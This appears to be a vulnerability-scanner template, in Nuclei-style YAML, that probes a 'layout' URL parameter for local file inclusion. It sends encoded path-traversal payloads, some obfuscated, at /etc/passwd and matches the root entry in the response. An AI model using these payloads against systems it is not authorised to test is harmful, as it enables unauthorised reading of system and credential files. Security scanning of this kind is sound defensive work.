id: param-lfi1-layout

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     layoutectory traversal via the GET /.. substring.

  tags: param-lfi1-layout

requests:
  - method: GET
    path:
      - "{{BaseURL}}?layout=%ae%2fe't'c%2fpa's'swd"
      - "{{BaseURL}}?layout=%ae%2fetc%2fpasswd"
      - "{{BaseURL}}?layout=.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

